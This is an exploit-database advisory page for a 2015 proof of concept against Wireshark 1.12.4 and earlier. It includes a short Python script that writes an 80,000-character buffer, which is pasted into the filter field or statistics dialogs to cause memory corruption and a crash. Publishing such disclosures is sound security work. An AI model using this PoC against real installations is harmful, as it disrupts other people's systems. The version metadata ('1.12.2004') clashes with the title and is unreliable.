WIRESHARK - exploit.company

vendor:

Wireshark

by:

Avinash Kumar Thapa '-Acid'

7.5

CVSS

HIGH

Access Violation and Memory Corruption

119

CWE

Product Name: Wireshark

Affected Version From: 1.12.2004

Affected Version To: 1.12.2004

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 8.1 Pro

2015

WIRESHARK <=1.12.4 Access Violation and Memory Corruption PoC

A buffer overflow vulnerability exists in Wireshark version 1.12.4 and earlier. An attacker can exploit this vulnerability by creating a file with a large buffer of data and then entering the buffer into the filter field of Wireshark. This will cause a memory corruption and access violation, resulting in a crash. Other places for the crash include Statistics > IP Statistics, Statistics > Packet Length, Statistics > ANCP, Statistics > Collectd, Statistics > Compared, and Statistics >.

Mitigation:

Upgrade to the latest version of Wireshark to mitigate this vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/python
# EXPLOIT TITLE: WIRESHARK <=1.12.4 Access Violation and Memory Corruption PoC
# AUTHOR: Avinash Kumar Thapa "-Acid"
# Date of Testing: 26th April'2015
# Vendor Homepage: http://www.wireshark.org
# Tested On : Windows 8.1 Pro
# Steps to Reproduce the Crash
# Step 1: Create a File Using PoC
# Step 2: Go to wirehshark and in filter field, put ip.addr=={Buffer}
# Step 3: Click "Apply"
# Some other places for the Crash are:
# Statistics > IP Statistics then any of the field you can use.
# Statistics > Packet Length > Paste the buffer in the field
# Statistics > ANCP
# Statistics > Collectd
# Statistics > Compared
# Statistis  > 


buffer = "A"*80000

file = open("wireshark.txt","w")
file.write(buffer)
file.close()

print "POC Created by -Acid"
print " Email: acid.exploit@gmail.com"